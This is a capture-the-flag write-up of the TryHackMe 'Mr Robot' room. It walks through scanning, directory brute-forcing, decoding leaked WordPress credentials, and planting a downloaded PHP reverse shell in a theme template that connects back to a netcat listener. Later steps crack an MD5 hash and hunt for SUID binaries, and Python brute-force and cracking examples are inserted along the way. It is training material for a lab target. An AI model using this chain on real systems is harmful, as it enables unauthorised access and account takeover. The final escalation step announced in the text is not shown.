Mr Robot CTF on TryHackMe

Shehan Sanjula
SLIIT FOSS Community
8 min read · Oct 1, 2021


Based on the Mr. Robot show, can you root this box?

TryHackMe is an amazing platform to learn cyber security and it’s an amazing asset if you are new to it and don’t know where to start. They have something called rooms that are basically vulnerable machines that you can deploy and practice your skills.

The best part about TryHackMe is that it’s pretty hands-on. If you are new to security, make sure you give it a try. In this article, we are going to solve the Mr Robot CTF from TryHackMe. This room has three flags to retrieve from the target. 🙂

Difficulty: Medium

1. Connect to TryHackMe network

To deploy the Mr Robot virtual machine, we will first need to connect to the TryHackMe network. In this write-up, I am going to use the OpenVPN client to connect.

Go to your access page and download your configuration file.

After downloading the .ovpn file, now we can create our OpenVPN session.

sudo openvpn CONFIG_FILE_NAME.ovpn

After running this command, you’ll get an output like below.

2021-xx-xx xx:xx:xx Initialization Sequence Completed

It means that you have successfully connected to TryHackMe through the VPN connection. You can verify it by navigating to the TryHackMe access page.

Enough talks 🥱, let’s get started to hack. 🐱‍💻

2. Start the Machine

Now click the Start Machine button in Task 2 on TryHackMe.

Disclaimer: no flags (user/root) are shown in this write-up (as usual in write-ups), so follow the steps to grab the flags yourself! 🐱‍👤

Enumeration

As always, let’s start with the Nmap scan.

nmap -sC -sV 10.10.xxx.xxx

-sC : run the default NSE script set
-sV : probe open ports to fingerprint the service and version

Here is the output 👇

Starting Nmap 7.91 ( https://nmap.org ) at 2021-xx-xx xx:xx EDT
Nmap scan report for 10.10.xxx.xxx
Host is up (0.27s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
22/tcp closed ssh
80/tcp open http Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
443/tcp open ssl/http Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015-09-16T10:45:03
|_Not valid after: 2025-09-13T10:45:03
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 49.97 seconds

Of the 1,000 ports Nmap scans by default, three respond: HTTP (80) and HTTPS (443) are open, SSH (22) is closed, and the remaining 997 are filtered. The TLS certificate on 443 is a placeholder (www.example.com), so it tells us nothing about the site.

Getting the first key

Now that we know the target is running a web server, we should brute-force directories and files to see what is available. You can use gobuster or dirb, but I like to use dirbuster. (In the following steps, I will show both dirbuster and gobuster.)

Similar in concept to password brute-forcing, we take a list of words from a file and request each one as a path on the web server. If the server answers with a 2xx or 3xx status code, we know something is there: a 301 usually means a directory, a 302 a redirect (for example to a login page), and a 403 is still interesting because it means the path exists but we may not browse it.

Using dirbuster:

Running the dirbuster command in your terminal opens the dirbuster GUI. Enter the target URL (http://10.10.xxx.xxx/), pick a wordlist such as /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt, and start the scan.

Once the scan is complete you can generate a report of everything it found.

Using gobuster:

gobuster dir -u 10.10.xxx.xxx -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
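To show what these tools do under the hood, here is an added example (not code from the original write-up or from gobuster): a minimal brute-forcer in Python that deduplicates the wordlist, requests each candidate path with optional extensions, and reports only 2xx/3xx answers without following redirects, so a 301 or 302 is reported as itself rather than as whatever it points to. The fetch function is a parameter so the loop can be exercised offline with a fake one; the hostname and status table used for that are made up.

```python
"""Minimal directory brute-forcer: the loop gobuster/dirbuster run for us.

Added example, not code from the original write-up or from gobuster. It
requests base + "/" + word (optionally with extensions), does not follow
redirects (a 301/302 is itself the signal that something is there), and
keeps every 2xx/3xx answer. The fetcher is a parameter so the logic can be
exercised offline with a fake one; the default uses urllib.
"""
import urllib.error
import urllib.request
from typing import Callable, Iterable, List, Tuple


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    # Returning None makes urllib raise HTTPError for the 30x instead of
    # following it, so we see the redirect status rather than its target.
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def http_status(url: str, timeout: float = 5.0) -> int:
    """Return the HTTP status for url, or 0 on a connection-level failure."""
    opener = urllib.request.build_opener(_NoRedirect)
    try:
        with opener.open(url, timeout=timeout) as resp:
            return resp.getcode()
    except urllib.error.HTTPError as err:
        return err.code                     # 3xx/4xx/5xx land here
    except urllib.error.URLError:
        return 0


def dedupe(words: Iterable[str]) -> List[str]:
    """Strip, drop blanks and repeats, keep first-seen order (fsocity.dic
    style lists repeat entries, and each repeat would cost a request)."""
    seen, out = set(), []
    for word in words:
        word = word.strip()
        if word and word not in seen:
            seen.add(word)
            out.append(word)
    return out


def brute(base: str, words: Iterable[str],
          fetch: Callable[[str], int] = http_status,
          extensions: Tuple[str, ...] = ("",)) -> List[Tuple[str, int]]:
    """Return [(path, status), ...] for every candidate answering 2xx/3xx."""
    base = base.rstrip("/")
    hits = []
    for word in dedupe(words):
        for ext in extensions:
            path = "/" + word + ext
            status = fetch(base + path)
            if 200 <= status < 400:
                hits.append((path, status))
    return hits


if __name__ == "__main__":
    import sys
    # usage: python brute.py http://10.10.xxx.xxx /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
    with open(sys.argv[2]) as fh:
        for path, status in brute(sys.argv[1], fh, extensions=("", ".php", ".txt")):
            print(f"{path} (Status: {status})")
```

Against a real target, add a small delay or a thread pool depending on how noisy you are allowed to be; the point of the example is the status handling, not speed.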

These scans take a while. If you would rather use the hint on TryHackMe, you can check robots.txt directly, without waiting for the brute force to finish.

Following the hint, let's see what's inside robots.txt. It discloses two files, one of which is the first key (073xxxxxxxxxxxxxxxx).

The second file, fsocity.dic, is a dictionary that we will probably need later, for the discovery of other locations or as a password list.

┌──(shehan㉿shehansanjula)-[~/TryHackMe/Mr Robot CTF]
└─$ curl -s http://10.10.xxx.xxx/fsocity.dic | head
true
false
wikia
from
the
now
Wikia
extensions
scss
window

Getting the second key

gobuster has discovered several locations, including:

  • /login (Status: 302)
  • /wp-content (Status: 301)
  • /admin (Status: 301)
  • /wp-login (Status: 200)
  • /license (Status: 200)
  • /wp-includes (Status: 301)
  • /wp-admin (Status: 301)

Browsing through some of these, the /license page turns out to disclose credentials:

curl -s http://10.10.xxx.xxx/license | tr -d "\n"

tr -> translate or delete characters
-d -> delete characters in SET1, do not translate
\n -> newline

Among the output is a string that looks base64-encoded, ZWxsaW90OkVSMjgtMDY1Mgo=. 🧐 Let's decode it:

echo "ZWxsaW90OkVSMjgtMDY1Mgo=" | base64 -d

Here is the output 👇

elliot:ER28-0652

If you have seen the Mr Robot TV series, probably you would have identified who that is. 🤖 Yeah, that’s Elliot!

Let's try these credentials against the WordPress login (/wp-login.php).
They work. 🤠 We have access to the WordPress dashboard.

The WordPress version is 4.3.1. Considering the current version is 5.8.1, we are likely to find vulnerabilities, but we may not even need one.

After snooping around a bit, I found out Elliot is an administrator of this website. Administrators can edit theme files through the built-in theme editor, which means we can make the server run PHP of our choosing.

First download the script:

wget https://raw.githubusercontent.com/ShehanSanjula/php-reverse-shell/master/php-reverse-shell.php

Go to Appearance > Editor and edit the first template (404.php), replacing its PHP code with the reverse shell from trusty PentestMonkey. Make sure you put your VPN interface IP in the script.

Run ifconfig tun0 (or ip addr show tun0) to get that address, and set the script's $ip and $port variables to it and to the port your listener will use (any port you like, as long as the listener matches).

If you are using Uncomplicated Firewall (ufw), remember to add a rule allowing inbound traffic on that port.

After replacing the 404 code, hit Update File in WordPress. To catch the connection I always use the Swiss army knife, netcat. 👽

Now open a listener (ports below 1024 need root on your side, so either run it with sudo or pick a high port and put the same port in the script):

nc -lvnp 443

-l -> listen mode
-v -> verbose
-n -> numeric-only IP addresses, no DNS
-p -> local port number

Now request a page that does not exist, for example http://10.10.xxx.xxx/404.php. WordPress renders the 404 template, which runs our PHP and connects back to the listener.

We can see our next key in /home/robot, but it is only readable by the robot user.

Alongside it sits the MD5 hash of the robot user's password:

$ cd /home/robot
$ ls
key-2-of-3.txt
password.raw-md5
$ cat password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b

MD5 is a one-way hash, so we cannot reverse it, but this one is unsalted and MD5 is fast, so a dictionary attack (hashcat -m 0, john, or simply an online lookup table) recovers the input in seconds: abcdefghijklmnopqrstuvwxyz.

That is very likely the password. So, let's try to log in as robot.
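The hash is unsalted, so one MD5 computation per candidate is all a wordlist attack costs. Here is an added example (not code from the original write-up) that parses the raw-md5 line shown above and runs a small dictionary attack against it. The hash line is the one from the box; SAMPLE_WORDLIST is a constructed stand-in for fsocity.dic, and the duplicate-skipping is there because wordlists like that one repeat entries.

```python
"""Dictionary attack on the unsalted MD5 hash from /home/robot/password.raw-md5.

Added example, not from the original write-up. SAMPLE_HASH_LINE is copied
from the box; SAMPLE_WORDLIST is a constructed stand-in for fsocity.dic.
"""
import hashlib
from typing import Iterable, Optional, Tuple


def parse_raw_md5(line: str) -> Tuple[str, str]:
    """Split a 'user:hexdigest' line of the raw-md5 format into its parts."""
    user, _, digest = line.strip().partition(":")
    digest = digest.lower()
    if len(digest) != 32 or any(c not in "0123456789abcdef" for c in digest):
        raise ValueError(f"not a raw MD5 digest: {digest!r}")
    return user, digest


def crack_md5(digest: str, candidates: Iterable[str]) -> Optional[str]:
    """Return the first candidate whose MD5 equals digest, or None."""
    seen = set()
    for word in candidates:
        word = word.rstrip("\r\n")
        if word in seen:
            continue            # repeated entries would only be re-hashed
        seen.add(word)
        if hashlib.md5(word.encode()).hexdigest() == digest:
            return word
    return None


SAMPLE_HASH_LINE = "robot:c3fcd3d76192e4007dfb496cca67e13b"
# Constructed stand-in for fsocity.dic (the real file is far longer).
SAMPLE_WORDLIST = ["true", "false", "wikia", "from", "the",
                   "abcdefghijklmnopqrstuvwxyz", "password"]


def crack_line(line: str = SAMPLE_HASH_LINE,
               wordlist: Iterable[str] = SAMPLE_WORDLIST) -> Tuple[str, Optional[str]]:
    """Parse one raw-md5 line and attack it with the given wordlist."""
    user, digest = parse_raw_md5(line)
    return user, crack_md5(digest, wordlist)


if __name__ == "__main__":
    # On the box you would pass the downloaded fsocity.dic instead:
    #   with open("fsocity.dic") as fh: print(crack_line(wordlist=fh))
    print(crack_line())
```

The lesson for the defender side is the same one the box teaches: an unsalted, fast hash of a dictionary word is effectively plaintext, which is why password storage uses a slow, salted construction such as bcrypt or Argon2.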

$ su - robot
su: must be run from a terminal

Well, we got an error. 😈 su insists on a real terminal, so let's check whether Python is installed and use it to spawn a pseudo-terminal. 😇

$ which python
/usr/bin/python
$ python -c 'import pty; pty.spawn("/bin/sh")'
$ su - robot
su - robot
Password: abcdefghijklmnopqrstuvwxyz
$ whoami
whoami
robot
$ cat key-2-of-3.txt
cat key-2-of-3.txt
822xxxxxxxxxxxxxxxxxxxx
$

Getting the third key

Our last key is very likely in the /root directory, so we will need to escalate privileges to read it.
The Nmap scan showed port 22 (SSH) closed, probably because the service is not running, so there is no way back in as another user; we have to work from this shell.
Unfortunately, our user robot is not in the sudoers:

The /etc/sudoers file controls who can run which commands as which users on which machines, and can also control special things such as whether a password is needed for particular commands.

$ sudo -l
sudo -l
[sudo] password for robot: abcdefghijklmnopqrstuvwxyz
Sorry, user robot may not run sudo on linux.
$

No need to worry. Let's find which root-owned programs have the setuid bit set (-perm -4000 matches the setuid bit; errors from unreadable directories are sent to /dev/null):

$ find / -user root -perm -4000 -print 2>/dev/null
/bin/ping
/bin/umount
/bin/mount
/bin/ping6
/bin/su
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/local/bin/nmap
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
/usr/lib/pt_chown

As I guessed, Nmap is on the list (it's also the room's hint, by the way). 😋

Besides, it's a very old release (3.81); the current release is 7.92 at the time of writing.

$ which nmap
which nmap
/usr/local/bin/nmap
$ nmap --version
nmap --version
nmap version 3.81 ( http://www.insecure.org/nmap/ )

Older Nmap releases (2.02 through 5.21) had an interactive mode (nmap --interactive) in which a line prefixed with ! is handed to the system shell.
Since this binary has the setuid bit set, that shell runs with root's effective UID, which means we can run commands as root:

$ ls -l /usr/local/bin/nmap
ls -l /usr/local/bin/nmap
-rwsr-xr-x 1 root root 504736 Nov 13 2015 /usr/local/bin/nmap

setuid: a bit that makes an executable run with the privileges of the file's owner (the s in the owner's execute position above)

setgid: a bit that makes an executable run with the privileges of the file's group

sticky bit: a bit set on directories so that only a file's owner (or root) can delete or rename entries inside it, even when the directory is world-writable, as with /tmp
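As an added example (not code from the original write-up), here is a small Python audit that decodes an ls -l mode string like the one above into its setuid/setgid/sticky bits and octal value, and then triages the find listing from earlier in this section, flagging root-owned setuid binaries that are not in a baseline, live outside distro-managed paths, or are known shell-escape programs. BASELINE and ESCAPE_CAPABLE are assumptions made for the example, not anything the box provides.

```python
"""Decode ls -l permission strings and flag suspicious setuid-root binaries.

Added example, not code from the original write-up. SAMPLE_FIND_OUTPUT is
the find(1) listing from the box. BASELINE is an assumed allow-list (in a
real audit, generate it from a clean build of the same image, e.g. by running
the same find there); ESCAPE_CAPABLE is an assumed, deliberately short list
of programs whose interactive or scripting features can hand out a shell, in
the spirit of the GTFOBins catalogue.
"""
import stat
from typing import Dict, Iterable, List, Tuple

SAMPLE_FIND_OUTPUT = """\
/bin/ping
/bin/umount
/bin/mount
/bin/ping6
/bin/su
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/local/bin/nmap
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
/usr/lib/pt_chown
"""

# Assumed allow-list: every entry above except the one we want to catch.
BASELINE = set(SAMPLE_FIND_OUTPUT.split()) - {"/usr/local/bin/nmap"}

# Assumed: programs with a shell-escape / interactive mode (GTFOBins-style).
ESCAPE_CAPABLE = {"nmap", "vim", "vi", "find", "less", "more", "awk",
                  "perl", "python", "python3", "bash", "sh", "env"}

NON_DISTRO_PREFIXES = ("/usr/local/", "/opt/", "/home/", "/tmp/", "/var/tmp/")


def parse_ls_mode(mode: str) -> Dict[str, object]:
    """Turn a 10-character ls -l mode (e.g. -rwsr-xr-x) into its bits."""
    if len(mode) != 10:
        raise ValueError(f"expected a 10-character mode string, got {mode!r}")
    perms = mode[1:]                      # drop the file-type character
    octal = 0
    for i, ch in enumerate(perms):
        if ch in "rwxst":                 # lowercase s/t imply the x bit too
            octal |= 1 << (8 - i)
    if perms[2] in "sS":
        octal |= stat.S_ISUID             # 4000: run as the file's owner
    if perms[5] in "sS":
        octal |= stat.S_ISGID             # 2000: run as the file's group
    if perms[8] in "tT":
        octal |= stat.S_ISVTX             # 1000: sticky (restricted deletion)
    return {
        "type": mode[0],
        "octal": octal,
        "setuid": bool(octal & stat.S_ISUID),
        "setgid": bool(octal & stat.S_ISGID),
        "sticky": bool(octal & stat.S_ISVTX),
    }


def audit_setuid(paths: Iterable[str]) -> List[Tuple[str, List[str]]]:
    """Return (path, reasons) for every setuid binary worth a closer look."""
    findings = []
    for path in paths:
        name = path.rsplit("/", 1)[-1]
        reasons = []
        if path not in BASELINE:
            reasons.append("not in baseline")
        if name in ESCAPE_CAPABLE:
            reasons.append("known shell-escape program")
        if path.startswith(NON_DISTRO_PREFIXES):
            reasons.append("installed outside distro-managed paths")
        if reasons:
            findings.append((path, reasons))
    return findings


if __name__ == "__main__":
    print(parse_ls_mode("-rwsr-xr-x"))   # setuid True, octal 4755
    for path, reasons in audit_setuid(SAMPLE_FIND_OUTPUT.split()):
        print(path, "->", ", ".join(reasons))
```

Run against the listing from the box, only /usr/local/bin/nmap is reported, for all three reasons at once; on a real engagement the same three checks (baseline drift, unusual install path, escape-capable program) are what make a setuid binary worth a second look, whether you are attacking or hardening the host.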

Let’s play with Nmap’s interactive mode:

So we have reached the end of the article. Thank you, and see you in the next one. Stay safe, and bye 👋.

You can find my articles on the Blog of Shehan as well. 👨‍💻
